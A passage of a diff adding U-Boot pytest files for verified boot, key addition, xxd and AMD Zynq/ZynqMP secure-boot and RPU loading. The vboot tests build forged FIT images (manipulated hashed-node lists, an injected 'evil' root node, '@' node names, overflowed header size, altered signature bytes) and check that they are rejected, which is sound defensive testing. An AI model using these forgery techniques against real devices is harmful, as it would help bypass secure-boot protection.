image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + # Build the FIT, but don't sign anything yet + ubman.log.action('%s: Test FIT with signed images' % sha_algo) + make_fit('sign-images-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned images', ' - OK' if algo_arg else 'dev-', True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed images', 'dev+', True) + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test FIT with signed configuration' % sha_algo) + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + run_bootm(sha_algo, 'unsigned config', '%s+ OK' % ('sha256' if algo_arg else sha_algo), True) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + run_bootm(sha_algo, 'signed config', 'dev+', True) + + ubman.log.action('%s: Check signed config on the host' % sha_algo) + + utils.run_and_log(ubman, [fit_check_sign, '-f', fit, '-k', dtb]) + + if full_test: + # Make sure that U-Boot checks that the config is in the list of + # hashed nodes. If it isn't, a security bypass is possible. + ffit = '%stest.forged.fit' % tmpdir + shutil.copyfile(fit, ffit) + with open(ffit, 'rb') as fd: + root, strblock = vboot_forge.read_fdt(fd) + root, strblock = vboot_forge.manipulate(root, strblock) + with open(ffit, 'w+b') as fd: + vboot_forge.write_fdt(root, strblock, fd) + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', ffit, '-k', dtb], + 1, 'Failed to verify required signature') + + run_bootm(sha_algo, 'forged config', 'Bad Data Hash', False, ffit) + + # Try adding an evil root node. This should be detected. + efit = '%stest.evilf.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'fakeroot') + + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', efit, '-k', dtb], + 1, 'Failed to verify required signature') + run_bootm(sha_algo, 'evil fakeroot', 'Bad FIT kernel image format', + False, efit) + + # Try adding an @ to the kernel node name. This should be detected. + efit = '%stest.evilk.fit' % tmpdir + shutil.copyfile(fit, efit) + vboot_evil.add_evil_node(fit, efit, evil_kernel, 'kernel@') + + msg = 'Signature checking prevents use of unit addresses (@) in nodes' + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', efit, '-k', dtb], + 1, msg) + run_bootm(sha_algo, 'evil kernel@', msg, False, efit) + + # Create a new properly signed fit and replace header bytes + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + bcfg = ubman.config.buildconfig + max_size = int(bcfg.get('config_fit_signature_max_size', 0x10000000), 0) + existing_size = replace_fit_totalsize(max_size + 1) + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + ubman.log.action('%s: Check overflowed FIT header totalsize' % sha_algo) + + # Replace with existing header bytes + replace_fit_totalsize(existing_size) + run_bootm(sha_algo, 'signed config', 'dev+', True) + ubman.log.action('%s: Check default FIT header totalsize' % sha_algo) + + # Increment the first byte of the signature, which should cause failure + sig = utils.run_and_log(ubman, 'fdtget -t bx %s %s value' % + (fit, sig_node)) + byte_list = sig.split() + byte = int(byte_list[0], 16) + byte_list[0] = '%x' % (byte + 1) + sig = ' '.join(byte_list) + utils.run_and_log(ubman, 'fdtput -t bx %s %s value %s' % + (fit, sig_node, sig)) + + run_bootm(sha_algo, 'Signed config with bad hash', 'Bad Data Hash', + False) + + ubman.log.action('%s: Check bad config on the host' % sha_algo) + utils.run_and_log_expect_exception( + ubman, [fit_check_sign, '-f', fit, '-k', dtb], + 1, 'Failed to verify required signature') + + def test_required_key(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This function tests if U-Boot rejects an image when a required key isn't + used to sign a FIT. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test FIT with configs images' % sha_algo) + + # Build the FIT with prod key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required' + make_fit('sign-configs-%s%s-prod.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit_norequire(sha_algo, sign_options) + + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Only the prod key is set as 'required'. But FIT we just built has + # a dev signature only (sign_fit_norequire() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required. + run_bootm(sha_algo, 'required key', '', False) + + # Build the FIT with dev key (keys required) and sign it. This puts the + # signature into sandbox-u-boot.dtb, marked 'required'. + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + sign_fit(sha_algo, sign_options) + + # Set the required-mode policy to "any". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should be accepted by + # U-Boot because the dev key is required and policy is "any" required key. + utils.run_and_log(ubman, 'fdtput -t s %s /signature required-mode any' % + dtb) + run_bootm(sha_algo, 'multi required key', 'dev+', True) + + # Set the required-mode policy to "all". + # So now sandbox-u-boot.dtb two signatures, for the prod and dev keys. + # Both the dev and prod key are set as 'required'. But FIT we just built has + # a dev signature only (sign_fit() overwrites the FIT). + # Try to boot the FIT with dev key. This FIT should not be accepted by + # U-Boot because the prod key is required and policy is "all" required key + utils.run_and_log(ubman, 'fdtput -t s %s /signature required-mode all' % + dtb) + run_bootm(sha_algo, 'multi required key', '', False) + + def test_global_sign(sha_algo, padding, sign_options): + """Test global image signature with the given hash algorithm and padding. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + """ + + dtb = '%ssandbox-u-boot-global%s.dtb' % (tmpdir, padding) + ubman.config.dtb = dtb + + # Compile our device tree files for kernel and U-Boot. These are + # regenerated here since mkimage will modify them (by adding a + # public key) below. + dtc('sandbox-kernel.dts', ubman, dtc_args, datadir, tmpdir, dtb) + dtc_options('sandbox-u-boot-global%s.dts' % padding, '-p 1024') + + # Build the FIT with dev key (keys NOT required). This adds the + # signature into sandbox-u-boot.dtb, NOT marked 'required'. + make_fit('simple-images.its', ubman, mkimage, dtc_args, datadir, fit) + sign_fit_dtb(sha_algo, '', dtb) + + # Build the dtb for binman that define the pre-load header + # with the global sigature. + dtc('sandbox-binman%s.dts' % padding, ubman, dtc_args, datadir, tmpdir, dtb) + + # Run binman to create the final image with the not signed fit + # and the pre-load header that contains the global signature. + run_binman('sandbox-binman%s.dtb' % padding) + + # Check that the signature is correctly verified by u-boot + run_bootm(sha_algo, 'global image signature', + 'signature check has succeed', True, "%ssandbox.img" % tmpdir) + + # Corrupt the image (just one byte after the pre-load header) + corrupt_file("%ssandbox.img" % tmpdir, 4096, 255); + + # Check that the signature verification fails + run_bootm(sha_algo, 'global image signature', + 'signature check has failed', False, "%ssandbox.img" % tmpdir) + + # Check that the boot fails if the global signature is not provided + run_bootm(sha_algo, 'global image signature', 'signature is mandatory', False) + + tmpdir = os.path.join(ubman.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = ubman.config.build_dir + '/tools/mkimage' + binman = ubman.config.source_dir + '/tools/binman/binman' + fit_check_sign = ubman.config.build_dir + '/tools/fit_check_sign' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + sig_node = '/configurations/conf-1/signature' + + create_rsa_pair('dev') + create_rsa_pair('prod') + + # Create a number kernel image with zeroes + with open('%stest-kernel.bin' % tmpdir, 'wb') as fd: + fd.write(500 * b'\0') + + # Create a second kernel image with ones + evil_kernel = '%stest-kernel1.bin' % tmpdir + with open(evil_kernel, 'wb') as fd: + fd.write(500 * b'\x01') + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = ubman.config.dtb + try: + ubman.config.dtb = dtb + if global_sign: + test_global_sign(sha_algo, padding, sign_options) + elif required: + test_required_key(sha_algo, padding, sign_options) + else: + test_with_algo(sha_algo, padding, sign_options) + finally: + # Go back to the original U-Boot with the correct dtb. + ubman.config.dtb = old_dtb + ubman.restart_uboot() + + +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False], + ['sha1-pss', 'sha1', '-pss', None, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False], + ['sha256-basic', 'sha256', '', None, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False], + ['sha256-pss', 'sha256', '-pss', None, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha256-pss-required', 'sha256', '-pss', None, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', False], + ['sha384-basic', 'sha384', '', None, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', True], + ['sha256-global-sign', 'sha256', '', '', False], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,algo_arg", TESTDATA) +def test_fdt_add_pubkey(ubman, name, sha_algo, padding, sign_options, algo_arg): + """Test fdt_add_pubkey utility with bunch of different algo options.""" + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def test_add_pubkey(sha_algo, padding, sign_options): + """Test fdt_add_pubkey utility with given hash algorithm and padding. + + This function tests if fdt_add_pubkey utility may add public keys into dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to use + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit image. + """ + + # Create a fresh .dtb without the public keys + dtc('sandbox-u-boot.dts', ubman, dtc_args, datadir, tmpdir, dtb) + + ubman.log.action('%s: Test fdt_add_pubkey with signed configuration' % sha_algo) + # Then add the dev key via the fdt_add_pubkey tool + utils.run_and_log(ubman, + [fdt_add_pubkey, '-a', '%s,%s' % + ('sha256' if algo_arg else sha_algo, + 'rsa3072' if sha_algo == 'sha384' else 'rsa2048'), + '-k', tmpdir, '-n', 'dev', '-r', 'conf', dtb]) + + make_fit('sign-configs-%s%s.its' % (sha_algo, padding), ubman, mkimage, dtc_args, datadir, fit) + + # Sign images with our dev keys + sign_fit(sha_algo, sign_options) + + # Check with fit_check_sign that FIT is signed with key + utils.run_and_log(ubman, [fit_check_sign, '-f', fit, '-k', dtb]) + + tmpdir = os.path.join(ubman.config.result_dir, name) + '/' + if not os.path.exists(tmpdir): + os.mkdir(tmpdir) + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + fit = '%stest.fit' % tmpdir + mkimage = ubman.config.build_dir + '/tools/mkimage' + binman = ubman.config.source_dir + '/tools/binman/binman' + fit_check_sign = ubman.config.build_dir + '/tools/fit_check_sign' + fdt_add_pubkey = ubman.config.build_dir + '/tools/fdt_add_pubkey' + dtc_args = '-I dts -O dtb -i %s' % tmpdir + dtb = '%ssandbox-u-boot.dtb' % tmpdir + + # keys created in test_vboot test + + test_add_pubkey(sha_algo, padding, sign_options) diff --git a/test/py/tests/test_vpl.py b/test/py/tests/test_vpl.py new file mode 100644 index 00000000000..a269c7c262e --- /dev/null +++ b/test/py/tests/test_vpl.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +def test_vpl(ubman, ut_vpl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + vpl/u-boot-vpl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): VPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + ubman.restart_uboot_with_flags(['-u', '-k', ut_vpl_subtest.split()[1]]) + output = ubman.get_spawn_output().replace('\r', '') + assert 'failures: 0' in output + finally: + # Restart afterward in case a non-VPL test is run next. This should not + # happen since VPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + ubman.restart_uboot() diff --git a/test/py/tests/test_xxd/conftest.py b/test/py/tests/test_xxd/conftest.py new file mode 100644 index 00000000000..47c7cce1aa9 --- /dev/null +++ b/test/py/tests/test_xxd/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for xxd command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def xxd_data(u_boot_config): + """Set up a file system to be used in xxd tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_xxd' + image_path = u_boot_config.persistent_data_dir + '/xxd.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n\x00\x01\x02\x03\x04\x05') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_xxd/test_xxd.py b/test/py/tests/test_xxd/test_xxd.py new file mode 100644 index 00000000000..c04bf8b7a25 --- /dev/null +++ b/test/py/tests/test_xxd/test_xxd.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for xxd command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_xxd') +def test_xxd(ubman, xxd_data): + """ Unit test for xxd + + Args: + ubman -- U-Boot console + xxd_data -- Path to the disk image used for testing. + """ + response = ubman.run_command_list([ + f'host bind 0 {xxd_data}', + 'xxd host 0 hello']) + + assert '00000000: 68 65 6c 6c 6f 20 77 6f 72 6c 64 0a 00 01 02 03 hello world.....\r\r\n' + \ + '00000010: 04 05 ..' \ + in response diff --git a/test/py/tests/test_zynq_secure.py b/test/py/tests/test_zynq_secure.py new file mode 100644 index 00000000000..f066a03b182 --- /dev/null +++ b/test/py/tests/test_zynq_secure.py @@ -0,0 +1,190 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import utils +import test_net + +""" +This test verifies different type of secure boot images to authentication and +decryption using AES and RSA features for AMD's Zynq SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. It also relies on dhcp or setup_static net test +to support tftp to load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server and addresses +# and size for aes and rsa cases respectively. This variable may be omitted or +# set to None if zynqmp secure testing is not possible or desired. +env__zynq_aes_readable_file = { + 'fn': 'zynq_aes_image.bin', + 'fnbit': 'zynq_aes_bit.bin', + 'fnpbit': 'zynq_aes_par_bit.bin', + 'srcaddr': 0x1000000, + 'dstaddr': 0x2000000, + 'dstlen': 0x1000000, +} + +env__zynq_rsa_readable_file = { + 'fn': 'zynq_rsa_image.bin', + 'fninvalid': 'zynq_rsa_image_invalid.bin', + 'srcaddr': 0x1000000, +} +""" + +def zynq_secure_pre_commands(ubman): + output = ubman.run_command('print modeboot') + if not 'modeboot=' in output: + pytest.skip('bootmode cannnot be determined') + m = re.search('modeboot=(.+?)boot', output) + if not m: + pytest.skip('bootmode cannnot be determined') + bootmode = m.group(1) + if bootmode == 'jtag': + pytest.skip('skipping due to jtag bootmode') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_image(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + dstaddr = f.get('dstaddr', None) + if not dstaddr: + pytest.skip('No dstaddr specified in env file to read') + + dstsize = f.get('dstlen', None) + if not dstsize: + pytest.skip('No dstlen specified in env file to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command( + 'zynq aes %x $filesize %x %x' % (srcaddr, dstaddr, dstsize) + ) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_bitstream(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnbit'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command( + 'zynq aes load %x $filesize' % (srcaddr) + ) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_partial_bitstream(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnpbit'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command('zynq aes loadp %x $filesize' % (srcaddr)) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image(ubman): + f = ubman.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = ubman.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image_invalid(ubman): + f = ubman.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fninvalid = f['fninvalid'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fninvalid)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = ubman.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op in output + output = ubman.run_command('echo $?') + assert not output.endswith('0') diff --git a/test/py/tests/test_zynqmp_rpu.py b/test/py/tests/test_zynqmp_rpu.py new file mode 100644 index 00000000000..cda8c9203b7 --- /dev/null +++ b/test/py/tests/test_zynqmp_rpu.py @@ -0,0 +1,222 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import string +import test_net + +""" +Note: This test relies on boardenv_* containing configuration values to define +RPU applications information for AMD's ZynqMP SoC which contains, application +names, processors, address where it is built, expected output and the tftp load +addresses. This test will be automatically skipped without this. + +It also relies on dhcp or setup_static net test to support tftp to load +application on DDR. All the environment parameters are stored sequentially. +The length of all parameters values should be same. For example, if 2 app_names +are defined in a list as a value of parameter 'app_name' then the other +parameters value also should have a list with 2 items. +It will run RPU cases for all the applications defined in boardenv_* +configuration file. + +Example: +env__zynqmp_rpu_apps = { + 'app_name': ['hello_world_r5_0_ddr.elf', 'hello_world_r5_1_ddr.elf'], + 'proc': ['rpu0', 'rpu1'], + 'cpu_num': [4, 5], + 'addr': [0xA00000, 0xB00000], + 'output': ['Successfully ran Hello World application on DDR from RPU0', + 'Successfully ran Hello World application on DDR from RPU1'], + 'tftp_addr': [0x100000, 0x200000], +} +""" + +# Get rpu apps params from env +def get_rpu_apps_env(ubman): + rpu_apps = ubman.config.env.get('env__zynqmp_rpu_apps', False) + if not rpu_apps: + pytest.skip('ZynqMP RPU application info not defined!') + + apps = rpu_apps.get('app_name', None) + if not apps: + pytest.skip('No RPU application found!') + + procs = rpu_apps.get('proc', None) + if not procs: + pytest.skip('No RPU application processor provided!') + + cpu_nums = rpu_apps.get('cpu_num', None) + if not cpu_nums: + pytest.skip('No CPU number for respective processor provided!') + + addrs = rpu_apps.get('addr', None) + if not addrs: + pytest.skip('No RPU application build address found!') + + outputs = rpu_apps.get('output', None) + if not outputs: + pytest.skip('Expected output not found!') + + tftp_addrs = rpu_apps.get('tftp_addr', None) + if not tftp_addrs: + pytest.skip('TFTP address to load application not found!') + + return apps, procs, cpu_nums, addrs, outputs, tftp_addrs + +# Check return code +def ret_code(ubman): + return ubman.run_command('echo $?') + +# Initialize tcm +def tcminit(ubman, rpu_mode): + output = ubman.run_command(f'zynqmp tcminit {rpu_mode}') + assert 'Initializing TCM overwrites TCM content' in output + return ret_code(ubman) + +# Load application in DDR +def load_app_ddr(ubman, tftp_addr, app): + output = ubman.run_command('tftpboot %x %s' % (tftp_addr, app)) + assert 'TIMEOUT' not in output + assert 'Bytes transferred = ' in output + + # Load elf + ubman.run_command('bootelf -p %x' % tftp_addr) + assert ret_code(ubman).endswith('0') + +# Disable cpus +def disable_cpus(ubman, cpu_nums): + for num in cpu_nums: + ubman.run_command(f'cpu {num} disable') + +# Get random RPU mode between string and integer +def get_rpu_mode(rpu_mode): + if rpu_mode == 0 or rpu_mode == 'lockstep': + return random.choice(['lockstep', 0]) + elif rpu_mode == 1 or rpu_mode == 'split': + return random.choice(['split', 1]) + +# Load apps on RPU cores +def rpu_apps_load(ubman, rpu_mode): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + try: + assert tcminit(ubman, get_rpu_mode(rpu_mode)).endswith('0') + + for i in range(len(apps)): + if rpu_mode == 'lockstep' and procs[i] != 'rpu0': + continue + + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + rel_addr = hex(int(addrs[i] + 0x3C)) + + # Release cpu at app load address + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + ubman.wait_for(outputs[i]) + assert ret_code(ubman).endswith('0') + finally: + disable_cpus(ubman, cpu_nums) + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_split(ubman): + rpu_apps_load(ubman, 'split') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_lockstep(ubman): + rpu_apps_load(ubman, 'lockstep') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_negative(ubman): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + ubman) + + # Invalid commands + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + rand_num = random.randint(2, 100) + inv_modes = ['mode', rand_str, rand_num, 'splittt', 'locksteppp', '00', 11] + + for mode in inv_modes: + ubman.run_command(f'zynqmp tcminit {mode}') + assert ret_code(ubman).endswith('1') + + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + try: + rpu_mode = 'split' + assert tcminit(ubman, get_rpu_mode(rpu_mode)).endswith('0') + + inv_modes += [0, 1] + for i in range(len(apps)): + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + + # Run in split mode at different load address + rel_addr = hex(int(addrs[i]) + random.randint(200, 1000)) + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert not outputs[i] in output + + # Invalid rpu mode + for mode in inv_modes: + cmd = f'cpu {cpu_num} release {rel_addr} {mode}' + output = ubman.run_command(cmd) + assert exp_op in output + assert f'Unsupported mode' in output + assert not ret_code(ubman).endswith('0') + + # Switch to lockstep mode, without disabling CPUs + rpu_mode = 'lockstep' + output = ubman.run_command( + f'zynqmp tcminit {get_rpu_mode(rpu_mode)}' + ) + assert 'ERROR: ' in output + + # Disable cpus + disable_cpus(ubman, cpu_nums) + + # Switch to lockstep mode, after disabling CPUs + output = ubman.run_command( + f'zynqmp tcminit {get_rpu_mode(rpu_mode)}' + ) + assert 'Initializing TCM overwrites TCM content' in output + assert ret_code(ubman).endswith('0') + + # Run lockstep mode for RPU1/RPU0 + for i in range(len(apps)): + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + rel_addr = hex(int(addrs[i] + 0x3C)) + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + + if procs[i] == 'rpu1': + assert 'Lockstep mode should run on ZYNQMP_CORE_RPU0' in output + assert not ret_code(ubman).endswith('0') + elif procs[i] == 'rpu0': + assert f'R5 {rpu_mode} mode' in output + ubman.wait_for(outputs[i]) + assert ret_code(ubman).endswith('0') + else: + assert False, 'ERROR: Invalid processor!' + finally: + disable_cpus(ubman, cpu_nums) + # This forces the console object to be shutdown, so any subsequent test + # will reset the board back into U-Boot. + ubman.drain_console() + ubman.cleanup_spawn() diff --git a/test/py/tests/test_zynqmp_secure.py b/test/py/tests/test_zynqmp_secure.py new file mode 100644 index 00000000000..c057e36383f --- /dev/null +++ b/test/py/tests/test_zynqmp_secure.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import utils +import test_net + +""" +This test verifies different type of secure boot images loaded at the DDR for +AMD's ZynqMP SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the files to be used for testing. Without this, this test will be automatically +skipped. It also relies on dhcp or setup_static net test to support tftp to +load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server. This +# variable may be omitted or set to None if zynqmp secure testing is not +# possible or desired. +env__zynqmp_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'aes.txt', +} +""" + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_image(ubman): + """This test verifies secure boot 